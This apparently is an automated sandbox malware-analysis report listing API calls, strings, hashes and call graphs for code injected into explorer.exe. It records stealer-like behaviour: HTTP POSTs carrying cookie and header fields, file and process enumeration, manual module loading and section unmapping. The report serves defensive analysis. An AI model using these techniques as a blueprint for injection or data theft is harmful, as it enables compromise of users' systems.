                                                                                                                                                                                                              • Opcode Fuzzy Hash: a325c1cb662c89e20bc298591119ff439962c79c4e796f1710cf704e3a530892
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC01DD71340346BFD3286A619C55F97779DEBD83AAF014529FA0BE3141DAF098808760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1141: lstrlen.KERNEL32(?,?,?,00000000,?,02CA29DD,00000001), ref: 02CA1150
                                                                                                                                                                                                                • Part of subcall function 02CA1141: lstrlen.KERNEL32(:method POST,?,00000000,?,02CA29DD,00000001), ref: 02CA1155
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000000A), ref: 02CA2FFA
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3024
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3052
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CA30B9
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02CA30E5
                                                                                                                                                                                                              • lstrcat.KERNEL32(?,{:!:}), ref: 02CA30F8
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,02CA6038), ref: 02CA3109
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000), ref: 02CA3112
                                                                                                                                                                                                                • Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
                                                                                                                                                                                                                • Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                                                                                                                                                                              • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                                                                                                                                                                              • API String ID: 2886538537-1627781280
                                                                                                                                                                                                              • Opcode ID: 8ee406401243029ffc60d867933269d4cfb81de7138297f09d7438c3f1b69768
                                                                                                                                                                                                              • Instruction ID: 3f874f89b1060d7899f34aed0aced55d461bc6357fe8395dc8eed51118cdab1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ee406401243029ffc60d867933269d4cfb81de7138297f09d7438c3f1b69768
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 863115717403436BD718AB249C75B6F36ABDBC074DF04842CF9069B281DBB5D8059BE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02CA322D
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CA329E
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02CA32AF
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,{:!:}), ref: 02CA32BE
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02CA32C1
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CA32D2
                                                                                                                                                                                                                • Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
                                                                                                                                                                                                                • Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                                                                                                                                                                              • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                                                                                                                                                                              • API String ID: 3430864794-1604029033
                                                                                                                                                                                                              • Opcode ID: fdfbcf3848b39e090e8344579fe378f759a84d3054c5b367f55921aa3f0e57bd
                                                                                                                                                                                                              • Instruction ID: fafac59142899c1ac56334337f86418edca5420a43cc7ce2217cd8e4fff8a47d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdfbcf3848b39e090e8344579fe378f759a84d3054c5b367f55921aa3f0e57bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6841AD71504346AFD310DF10DC59F6BBBEDFB84349F040A2EF58693241DBB499489BA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(02CA6038), ref: 02CA3455
                                                                                                                                                                                                              • lstrcat.KERNEL32 ref: 02CA34AB
                                                                                                                                                                                                                • Part of subcall function 02CA2FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 02CA2FFA
                                                                                                                                                                                                                • Part of subcall function 02CA2FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3024
                                                                                                                                                                                                                • Part of subcall function 02CA2FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3052
                                                                                                                                                                                                                • Part of subcall function 02CA2FAA: wsprintfA.USER32 ref: 02CA30B9
                                                                                                                                                                                                                • Part of subcall function 02CA2FAA: lstrcat.KERNEL32(00000000,00000000), ref: 02CA30E5
                                                                                                                                                                                                                • Part of subcall function 02CA2F1F: CreateThread.KERNEL32(00000000,00000000,02CA2ED2,?,00000000,00000000), ref: 02CA2F2F
                                                                                                                                                                                                                • Part of subcall function 02CA2F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 02CA2F36
                                                                                                                                                                                                                • Part of subcall function 02CA105D: VirtualFree.KERNEL32(?,00000000,00008000,02CA2BB2), ref: 02CA1065
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 02CA3504
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(?,00000000,?), ref: 02CA352B
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 02CA358D
                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(02CA6038), ref: 02CA35C1
                                                                                                                                                                                                                • Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                                                                                                                                                                              • String ID: $Content-Length:$POST
                                                                                                                                                                                                              • API String ID: 2960674810-114478848
                                                                                                                                                                                                              • Opcode ID: 7b2cfb6c0ca12090cc470418836b990fe8dd0b4678a5d9e295f38f30510c6cb4
                                                                                                                                                                                                              • Instruction ID: 706150340f507b1e70a7ca9320a347fdc2d3cfff9e87952ba7c08029bc80db48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b2cfb6c0ca12090cc470418836b990fe8dd0b4678a5d9e295f38f30510c6cb4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69312930A843828BCF14AF24D4B676A3B6EAB8530CF184A6DD90243241DB75C55CCFD9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                                • Part of subcall function 02CA106C: lstrlen.KERNEL32(?,?,00000000,00000000,02CA189F,74DE8A60,?,00000000), ref: 02CA1074
                                                                                                                                                                                                                • Part of subcall function 02CA106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 02CA1086
                                                                                                                                                                                                                • Part of subcall function 02CA17DC: RtlZeroMemory.NTDLL(?,00000018), ref: 02CA17EE
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 02CA18FB
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02CA19F2
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02CA1AD0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • POST, xrefs: 02CA19A0
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 02CA1A34
                                                                                                                                                                                                              • Accept: */*Referer: %S, xrefs: 02CA19E8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                                                                              • API String ID: 3833683434-704803497
                                                                                                                                                                                                              • Opcode ID: 95d1b5b2aa29737b7f6f5ea33e448c2547ec0c008fa4dd9e604628cc013b4bfb
                                                                                                                                                                                                              • Instruction ID: bc0deac83f1548304797a35b4827a738a71e98922154a1fc28e118a87eb28fb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95d1b5b2aa29737b7f6f5ea33e448c2547ec0c008fa4dd9e604628cc013b4bfb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00816E75644301AFD7249F64D894A2BB7E9EFC8358F04092DF54AD3250DBB0DD05CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,02CA2A16,?,00000001), ref: 02CA1056
                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02CA25BB
                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02CA42A8), ref: 02CA25C7
                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02CA25D6
                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02CA42AC), ref: 02CA25E5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$AllocVirtual
                                                                                                                                                                                                              • String ID: :authority$?$dyn_header
                                                                                                                                                                                                              • API String ID: 3028025275-1785586894
                                                                                                                                                                                                              • Opcode ID: 228ae17471cc338dfd0670f992ccd5c3840a36cdc870f614539968e764a9f022
                                                                                                                                                                                                              • Instruction ID: 2e0113035088f1736ab6af32e114441ae995e246a788909653cf922de1586fa7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 228ae17471cc338dfd0670f992ccd5c3840a36cdc870f614539968e764a9f022
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A61F6725083278FC714EE25D1B03AAB7E6ABD421CF44092DEC8557282D7749E0DEBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1141: lstrlen.KERNEL32(?,?,?,00000000,?,02CA29DD,00000001), ref: 02CA1150
                                                                                                                                                                                                                • Part of subcall function 02CA1141: lstrlen.KERNEL32(:method POST,?,00000000,?,02CA29DD,00000001), ref: 02CA1155
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 02CA291B
                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02CA42BC), ref: 02CA292A
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000001), ref: 02CA295C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$MemoryMovelstrcat
                                                                                                                                                                                                              • String ID: cookie
                                                                                                                                                                                                              • API String ID: 2957667536-1295510418
                                                                                                                                                                                                              • Opcode ID: a365728c64a5466fc4dc0b0e422f5d9adae4c76a373b578ab8d8d4e27955a2f5
                                                                                                                                                                                                              • Instruction ID: 3c7d8d8fea98afc59aa20b54979eb0d12408d2aa1ca1affe93bf671edecc857e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a365728c64a5466fc4dc0b0e422f5d9adae4c76a373b578ab8d8d4e27955a2f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2611E7723043135BC7249AA4DCA5B9B76E9EBC0B0CF14062DFD0197241E7E1E90A9792
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 02CA1E83
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02CA6058,00000000,00000000,74DF2EE0,00000000,02CA20DC,?), ref: 02CA1EAB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02CA1ED8
                                                                                                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02CA1F29
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3827878703-0
                                                                                                                                                                                                              • Opcode ID: 3ca162a459720f81de057d9c7005e98f607866194b17566d0286a67de474447e
                                                                                                                                                                                                              • Instruction ID: 8c79b2da9e436e2e8b47bb4db411878171d87d5e0710a18105af8f975c484317
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca162a459720f81de057d9c7005e98f607866194b17566d0286a67de474447e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D31B2767002439BCB288E2ACCA4BA6B798EF4531CF18456CE849C7200D7A2E855C7A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000), ref: 02CA12BC
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 02CA12CE
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 02CA12E1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA12F7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 331459951-0
                                                                                                                                                                                                              • Opcode ID: 39e123497ec5db25bf6b564563f01f9468909d751599c039e071917dadb82690
                                                                                                                                                                                                              • Instruction ID: e205e989a7e436069591cfc662774139a00b50f8bf9aabcda157e2e84773aa3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e123497ec5db25bf6b564563f01f9468909d751599c039e071917dadb82690
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10F09071C46219FF9B24CFA0A9459EEBB6CEB0125DF14436AE805D3140D7B08F11EAA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(02CA6038), ref: 02CA3332
                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(02CA6038), ref: 02CA3358
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                                              • API String ID: 3168844106-1814004025
                                                                                                                                                                                                              • Opcode ID: 6769167857f9a87575833160914cd7d4718b68344c75f8bf7a4b6d3095b20903
                                                                                                                                                                                                              • Instruction ID: 5b9bbeb71536eb7a8f85d6b56d523b0a18fa702ae6f6bb630594039bcee4b956
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6769167857f9a87575833160914cd7d4718b68344c75f8bf7a4b6d3095b20903
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E901A231905155EFCB251F20E86996F7B2AEFC176D7184461F90E83111CF31D992EAE1

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:7.9%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:42.9%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:49
                                                                                                                                                                                                              Total number of Limit Nodes:5
                                                                                                                                                                                                              execution_graph 1483 5dd748 1485 5dd74d 1483->1485 1484 5dd835 LoadLibraryA 1484->1485 1485->1484 1487 5dd884 VirtualProtect VirtualProtect 1485->1487 1489 5dd879 1485->1489 1488 5dd912 1487->1488 1488->1488 1524 5dd5da 1525 5dd614 1524->1525 1526 5dd6f8 1525->1526 1528 5dd748 1525->1528 1530 5dd74d 1528->1530 1529 5dd835 LoadLibraryA 1529->1530 1530->1529 1532 5dd884 VirtualProtect VirtualProtect 1530->1532 1534 5dd879 1530->1534 1533 5dd912 1532->1533 1533->1533 1534->1526 1490 5d4914 1502 5d1d08 CreateToolhelp32Snapshot 1490->1502 1493 5d1d08 4 API calls 1494 5d4941 1493->1494 1495 5d1d08 4 API calls 1494->1495 1496 5d494d SleepEx 1495->1496 1501 5d4962 1496->1501 1497 5d4a18 1498 5d49e0 1498->1497 1499 5d1eb4 6 API calls 1498->1499 1499->1497 1501->1498 1508 5d1eb4 1501->1508 1503 5d1d2c Process32First 1502->1503 1504 5d1d7a 1502->1504 1507 5d1d44 1503->1507 1504->1493 1505 5d1d71 CloseHandle 1505->1504 1506 5d1d5f Process32Next 1506->1507 1507->1505 1507->1506 1516 5d1db0 1508->1516 1510 5d1ed6 1511 5d1efd FindFirstFileW 1510->1511 1512 5d1f8f 1511->1512 1515 5d1f14 1511->1515 1512->1501 1513 5d1f74 FindNextFileW 1514 5d1f86 FindClose 1513->1514 1513->1515 1514->1512 1515->1513 1517 5d1dde 1516->1517 1518 5d1dfb FindFirstFileW 1517->1518 1519 5d1e8e 1518->1519 1520 5d1e12 1518->1520 1519->1510 1521 5d1e73 FindNextFileW 1520->1521 1523 5d1eb4 3 API calls 1520->1523 1521->1520 1522 5d1e85 FindClose 1521->1522 1522->1519 1523->1520 1535 5dd637 1536 5dd62e 1535->1536 1537 5dd748 3 API calls 1536->1537 1538 5dd6f8 1536->1538 1537->1538

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_005D4C5C 1 Function_005D345C 51 Function_005D1838 1->51 80 Function_005D1BE8 1->80 96 Function_005D188C 1->96 2 Function_005D4B5E 3 Function_005D2754 4 Function_005D1254 5 Function_005D3E4C 22 Function_005D1860 5->22 5->51 6 Function_005DD748 42 Function_005DD70A 6->42 7 Function_005D3B48 11 Function_005D317C 7->11 37 Function_005D2F10 7->37 8 Function_005D3048 8->51 9 Function_005D4540 71 Function_005D3FC0 9->71 9->80 101 Function_005D4280 9->101 10 Function_005D4C42 11->8 11->22 28 Function_005D311C 11->28 66 Function_005D18D0 11->66 89 Function_005D3094 11->89 12 Function_005D277C 12->3 21 Function_005D2964 12->21 12->66 13 Function_005D4A7C 14 Function_005DD57E 15 Function_005D6279 16 Function_005D1B74 17 Function_005D1576 18 Function_005D156C 19 Function_005D4B6F 20 Function_005D2368 20->22 20->51 52 Function_005D1938 20->52 20->66 76 Function_005D18F8 20->76 87 Function_005D2298 20->87 20->96 85 Function_005D299C 21->85 22->80 23 Function_005D1560 24 Function_005D3F60 24->22 32 Function_005D2214 24->32 81 Function_005D18E8 24->81 93 Function_005D268C 24->93 25 Function_005DCD63 26 Function_005D141D 27 Function_005D211C 29 Function_005D4B1E 30 Function_005D3818 30->22 39 Function_005D370C 30->39 45 Function_005D1A04 30->45 30->51 30->66 30->81 82 Function_005D21E4 30->82 91 Function_005D3690 30->91 31 Function_005D4C14 32->51 33 Function_005D2B14 34 Function_005D4914 34->22 41 Function_005D1D08 34->41 34->51 106 Function_005D1EB4 34->106 35 Function_005DD416 36 Function_005D4710 36->45 36->66 36->71 77 Function_005D3FF8 36->77 79 Function_005D3CF0 36->79 36->80 36->81 88 Function_005D4094 36->88 37->51 38 Function_005DCC0D 39->45 40 Function_005D1508 67 Function_005D1CD0 41->67 43 Function_005D1405 44 Function_005D5104 44->16 44->45 47 Function_005D2C00 44->47 44->51 44->52 58 Function_005D1C28 44->58 60 Function_005D3F20 44->60 69 Function_005D1BC8 44->69 44->80 100 Function_005D1C80 44->100 115 Function_005D1CA0 44->115 46 Function_005D1000 47->33 72 Function_005D29C0 47->72 47->80 48 Function_005D5300 48->44 48->48 48->51 48->80 103 Function_005D4C80 48->103 49 Function_005D343C 50 Function_005D3C3C 50->1 50->7 50->81 53 Function_005D2838 54 Function_005DD637 54->6 55 Function_005DD42D 56 Function_005D4B2E 57 Function_005D4C2E 59 Function_005D3424 60->5 61 Function_005D1822 62 Function_005DD5DA 62->6 63 Function_005D14D4 64 Function_005D1FD4 64->22 64->51 64->64 109 Function_005D1FB0 64->109 65 Function_005D28D4 65->3 65->53 65->80 68 Function_005D72D0 70 Function_005DD4C4 73 Function_005DD0C3 74 Function_005D35FC 74->22 74->80 75 Function_005D14F9 77->45 78 Function_005D3AF0 78->30 78->74 79->49 79->50 79->59 79->78 79->80 97 Function_005D3B8C 79->97 112 Function_005D3CAC 79->112 83 Function_005D45E0 83->71 83->80 83->101 84 Function_005DCCE2 86 Function_005D3D9C 88->22 88->45 88->51 88->77 89->22 89->51 98 Function_005D2F88 89->98 90 Function_005D3A90 90->22 90->32 90->81 90->93 91->45 92 Function_005DCD92 93->20 93->22 93->51 94 Function_005D1D8C 95 Function_005D1A8C 96->51 97->1 97->7 97->45 97->81 99 Function_005D2F84 101->22 101->45 101->51 102 Function_005D4680 102->71 102->80 102->101 103->12 103->22 103->27 103->51 103->65 103->80 103->86 103->95 104 Function_005D4BB8 105 Function_005DD0BB 106->22 106->51 106->94 108 Function_005D1DB0 106->108 107 Function_005DCFB7 108->22 108->51 108->94 108->106 110 Function_005D4BB0 111 Function_005D14B2 112->1 113 Function_005D4AA9 114 Function_005D44A4 114->71 114->79 114->88 116 Function_005D4BA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE ref: 005D1E03
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE ref: 005D1E7B
                                                                                                                                                                                                              • FindClose.KERNELBASE ref: 005D1E88
                                                                                                                                                                                                                • Part of subcall function 005D1EB4: FindFirstFileW.KERNELBASE ref: 005D1F05
                                                                                                                                                                                                                • Part of subcall function 005D1EB4: FindNextFileW.KERNELBASE ref: 005D1F7C
                                                                                                                                                                                                                • Part of subcall function 005D1EB4: FindClose.KERNELBASE ref: 005D1F89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                                                              • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                                                                              • Instruction ID: 87845ce94f43a8ec927f1c85db53cdcf8f9400916cf1eefe2c979fc6a3016c66
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F21953031CE085BDB58FB2CA8992693BD1FBD9350F50065FE94EC3296DE3499058789

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 005D1DB0: FindFirstFileW.KERNELBASE ref: 005D1E03
                                                                                                                                                                                                                • Part of subcall function 005D1DB0: FindNextFileW.KERNELBASE ref: 005D1E7B
                                                                                                                                                                                                                • Part of subcall function 005D1DB0: FindClose.KERNELBASE ref: 005D1E88
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE ref: 005D1F05
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE ref: 005D1F7C
                                                                                                                                                                                                              • FindClose.KERNELBASE ref: 005D1F89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                                                              • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                                                                              • Instruction ID: c9adf96a8cd2910e0503255f87a6c7179af3b68267fa0ff60b3cc67d6ec7e852
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1214F7020CE485BDB54FF2CA4983697BA1FBA8304F00066EA55AC3292DF38D944878A

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 137 5d5300-5d5310 call 5d1be8 140 5d5390-5d5395 137->140 141 5d5312-5d5345 call 5d1838 137->141 145 5d5347 call 5d1838 141->145 146 5d5371-5d538a NtUnmapViewOfSection 141->146 151 5d534c-5d5365 145->151 148 5d539c-5d53ab call 5d5104 146->148 149 5d538c-5d538e 146->149 156 5d53ad-5d53b0 call 5d5300 148->156 157 5d53b5-5d53be 148->157 149->140 152 5d5396-5d539b call 5d4c80 149->152 151->146 152->148 156->157
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 005D5378
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                              • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                                                                              • Instruction ID: a5c639791343880e3d6699aced5391b19f8916859feabc3b1288f6c863b2dcf2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
